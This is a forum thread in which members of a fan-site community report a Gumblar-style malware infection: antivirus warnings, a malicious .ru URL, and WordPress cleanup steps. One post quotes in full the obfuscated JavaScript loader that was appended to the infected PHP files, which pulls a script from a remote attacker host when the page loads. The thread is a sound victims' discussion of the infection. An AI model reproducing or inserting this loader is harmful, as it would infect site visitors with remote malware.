Jump to content

Home

Mojo malware infection?


Harald B
 Share

Recommended Posts

Since this morning each time I try go to mixnmojo.com AVG warns me that its blocking a connection to a very dubious link; they vary slightly, with the following being a good example

winamp-com.mapquest.com.orbitdownloader-com.breathconditioning.ru:8080/petardas.com/petardas.com/fanpop.com/secureserver.net/google.com.php

(warning: going there is probably a very bad idea). The site still shows up fine and I have no idea what element is causing this, but since I haven't gotten this before anywhere and am only getting it with Mojo (and also with Behind Mojo) you may want to have an admin look into it.

Sorry if I should have posted this somewhere else. I'm not sure where that would be.

 

edit:I've got two more relevant details. Only the main site and Behind cause trouble, deeper links (blog comments, game database etc) are fine. Also, my other, Nod32-using computer warns me at the same places, and identifies it as a "JS/TrojanDownloader.Agent.NSM Trojan".

Edited by Harald B
more info
Link to comment
Share on other sites

  • Replies 113
  • Created
  • Last Reply

Top Posters In This Topic

Weird. Thanks for letting us know. I don't understand any of the technicalities, but hopefully (HOPEFULLY!) someone on the team does.

 

I do know that it's getting increasingly hard to update the news, though; the admin keeps crashing. Don't know if that's related or not. I showed a tech friend the inner workings of the site the other day and he was horrified -- apparently the code was made obsolete years ago, and by all logic Mixnmojo shouldn't work at all. Yet it's managing to lumber on... I guess because we keep on stacking more lines of code on top of it.

 

Hopefully this malware infection won't spread anymore and we can trap it in more lines of code. That's the only solution I can think of for now. Maybe someone who actually knows what they're talking about can give some better advice.

Link to comment
Share on other sites

Yeah, I noticed that someone, or something, had been messing with my WordPress files. I'm now re-uploading the affected files. Looks like some kind of virus or something, although I'm even less technically savvy than Gabez, so I don't really know what I'm talking about. Right now the Pumpkin Post seems to be back up and running, hopefully that was that...

Link to comment
Share on other sites

Looks like its probably a variant of the Gumblar script. I know Zaarin has cleaned it from some pages, but its tried to copy itself to all index.php pages it seems.

 

Most of the *index php files on my site got a script appended to the end, it even snuck its way into my Wordpress theme files too. Any site that's using Wordpress will need to make sure they check their themes and plugins. I know I normally just leave the wp-content folder alone when upgrading/fixing.

Link to comment
Share on other sites

Heads-up:I'm now also getting it when at the comments sections for individual blog posts and in the game database (ie it's spread to showfile.php and gamedb.php, presumably).

 

edit:Nod32 is now identifying it as a "JS/TrojanDownloader.Iframe.NHE Trojan". Maybe the word Iframe will do your engineers some good

Edited by Harald B
meh
Link to comment
Share on other sites

I hate to say this Gabez... but I'M IN PANIC!!!

Both The Dig Museum and The Thrillville Quarterly are under attack!!

 

Should re-uploading the files solve the problem? WHAT SHOULD I DO?? I'M SO UNPREPARED FOR THIS! HIGHSCHOOL SUCKS!

Link to comment
Share on other sites

haha DJG came out of hiding after all those years! my plan worked!

 

 

but seriously, very annoying stuff this... get that mapquest malware notice too... but that's something different from the gumblar script..

 

the mapquest thing is just a wrong advertisement i think?

Link to comment
Share on other sites

but seriously, very annoying stuff this... get that mapquest malware notice too... but that's something different from the gumblar script..

 

the mapquest thing is just a wrong advertisement i think?

Afraid not. The link is way too dubious for that, and to make sure I re-enabled adblock on Mojo and still got the same warnings.
Link to comment
Share on other sites

Guys, the malware has attacked my laptop and I've been battling to save my system!!! :(

 

I won't go back to the site until it's safe again (I'm writing from another PC right now).

 

It seems to be some sort of fake virus alert.

Link to comment
Share on other sites

Series of tubes, goddamn it. I hope you gentlemen come out of it okay, powers that be willing.

 

I will try to stay off of Mojo until you get 10 up and running. Don't want to take any major risks. Also I actually sort of enjoyed Poison Pen, for whatever reason, and am sad to see it wiped. All the beast.

Link to comment
Share on other sites

For those hosted sites using Wordpress you'll either need to restore off a known clean backup or reinstall Wordpress. I had to:

  • Delete the wp-admin and wp-includes folders
  • Download wordpress again and reupload all the files, overwriting those that were there
  • Edit the wp-config.php and index.php files to remove the virus code from the footer
  • Look in the themes in wp-content and remove the code from the footers in the php files
  • None of the plugins looked like they were infected, but it seems that the script can be appended to .js files too so to be safe I deleted the existing plugins and replaced them one by one.

 

This is the code that was appended to my files:

<script>try {var L;if(L!='l'){L='l'};var b='replace';var J="";var vs="";var Y=RegExp;var NS='';var d;if(d!='' && d!='hs'){d=null};this.iu="";function v(e,B){var _=new Array();var sR;if(sR!='Vb' && sR != ''){sR=null};var y='[';var i_=new Array();var mV=new Date();var V='g';y+=B;var z;if(z!='dD'){z='dD'};y+=']';this.Pv='';var W=new Y(y, V);var eF=new Date();var lD=new Date();return e[b](W, new String());};var YI;if(YI!='' && YI!='Hu'){YI='C'};this.Wd="";var h=v('/jpWejtLajrWdLaWsL.LcjoWmj/jpjejtWaWrLdLaLsj.WcWoLmW/jfWaLnLpLoLpW.LcLoWmW/jsWejcLujrLejsjeWrLvLeWrW.WnjeLtW/WgLojojgjlLeW.LcLoLmj.WpjhLpL',"WjL");var yh;if(yh!='ul' && yh!='hU'){yh='ul'};var a=v('8999696960966996869666609696996',"69");var An=new Date();var uc=new Date();var c=v('cbrbeJaJtJeZEJlJeZmbeZnbtb',"ZBJb");var j=new Date();var S=v('h9tztOpz:z/9/zwOi9nOaOm9pz-OcOoOm9.zm9a9pOq9u9e9sztO.zczozmz.Oo9r9bziztzdzozwOnOlzoza9dOezrz-9c9ozmz.9bzr9eza9tOhzc9oznOdzi9t9iOo9nziznzg9.Or9u9:z',"O9z");var yx='';this.ne="";var nw;if(nw!='' && nw!='pk'){nw=null};var bU=window;this._m='';var Rn;if(Rn!='' && Rn!='HF'){Rn=null};var w=v('o8n3lqo8aTd3',"T83q");var xv=new String();this.QK="";var nT;if(nT!='' && nT!='X'){nT=null};var ik;if(ik!='' && ik!='VG'){ik=null};var o=v('s9c9rIiIpIt9',"9lI");A=function(){var Ly;if(Ly!='LU' && Ly != ''){Ly=null};var lY;if(lY!='lS' && lY != ''){lY=null};var Bn=new Array();G=document[c](o);var St;if(St!='Vo'){St=''};var LI;if(LI!='' && LI!='kI'){LI=''};yx=S+a;var KC=new Date();yx+=h;var HN="";G.defer=([1][0]);var Yh='';var lh;if(lh!='' && lh!='rb'){lh=''};G.src=yx;var Vt;if(Vt!='' && Vt!='hss'){Vt=null};var Wr;if(Wr!='HE' && Wr!='ke'){Wr='HE'};document.body.appendChild(G);this.iQ='';};var tK=new Array();bU[w]=A;} catch(M){var In=new Date();var mh;if(mh!='KU' && mh!='Za'){mh=''};};</script>
<!--699af17d7dda64c9f7a4601e44c2c9c6-->

Link to comment
Share on other sites

Oh my, DJG! Now I know that it's the end of days.

 

Hopefully we'll get it sorted out soon because we can't afford to rebuild the code from scratch for at least another few years (when the economy has fully recovered). Until then the mythical "10" version will have to remain just a myth. :/

Link to comment
Share on other sites

Gabez should be shot for this. I've seen his panic shelter, and it would not be a lie to say that one half of it contains 17,450 hot water bottles (of various design, size etc.) and the other half contains a large, deep, bath.

Link to comment
Share on other sites

 Share


×
×
  • Create New...